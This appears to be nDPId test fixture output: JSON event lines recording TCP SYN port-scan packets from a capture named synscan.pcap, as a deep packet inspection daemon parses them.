+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsrJgAADMGaNqsEAAIQA2GNIzTEdfdU4MZAAAAAGACEAAWtQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsOqsAADkG1MesEAAIQA2GNIzTTj\/dU4MZAAAAAGACCADiTAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsfAoAACkGo2isEAAIQA2GNIzTJxDdU4MZAAAAAGACCAAJfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAADoGDTOsEAAIQA2GNIzTJMrdU4MZAAAAAGACDAAHwgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsEygAADoG+0qsEAAIQA2GNIzTBrfdU4MZAAAAAGACDAAl1QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsokMAADcGby+sEAAIQA2GNIzTCPDdU4MZAAAAAGACEAAfnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6UAAC0GU82sEAAIQA2GNIzTFxLdU4MZAAAAAGACCAAZegAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsiMQAADcGiK6sEAAIQA2GNIzSG7zdUoMYAAAAAGACEAAM0wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfcAADsGb3usEAAIQA2GNIzSDwvdUoMYAAAAAGACEAAZhAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAspuwAAC8GcoasEAAIQA2GNIzSJ8TdUoMYAAAAAGACEAAAywAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAszy0AACkGUEWsEAAIQA2GNIzSG1ndUoMYAAAAAGACCAAVNgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsh1cAADAGkRusEAAIQA2GNIzSEWHdUoMYAAAAAGACBAAjLgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswFUAACcGYR2sEAAIQA2GNIzS1DjdUoMYAAAAAGACEABUVgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACoGCumsEAAIQA2GNIzSAFPdUoMYAAAAAGACDAAsPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SUAACkGQk2sEAAIQA2GNIzSBR3dUoMYAAAAAGACCAArcgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsDlsAADMGBxisEAAIQA2GNIzSH0ndUoMYAAAAAGACEAAJRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswGIAADAGWBCsEAAIQA2GNIzSEPfdUoMYAAAAAGACBAAjmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsercAADEGnLusEAAIQA2GNIzSI1rdUoMYAAAAAGACCAANNQAAAgQFtA=="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1278275059462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059462,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstMUAACUGbq2sEAAIQA2GNIzSD0HdUoMYAAAAAGACCAAhTgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsfagAAC8Gm8qsEAAIQA2GNIzSHcndUoMYAAAAAGACEAAKxgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsrK8AADQGZ8OsEAAIQA2GNIzSJxTdUoMYAAAAAGACBAANewAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsLFMAADMG6R+sEAAIQA2GNIzSGnvdUoMYAAAAAGACEAAOFAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3gAADkG+\/qsEAAIQA2GNIzSF2\/dUoMYAAAAAGACCAAZIAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsscoAACYGcKisEAAIQA2GNIzSFrLdUoMYAAAAAGACDAAV3QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsQukAACYG34msEAAIQA2GNIzSI43dUoMYAAAAAGACDAAJAgAAAgQFtA=="} 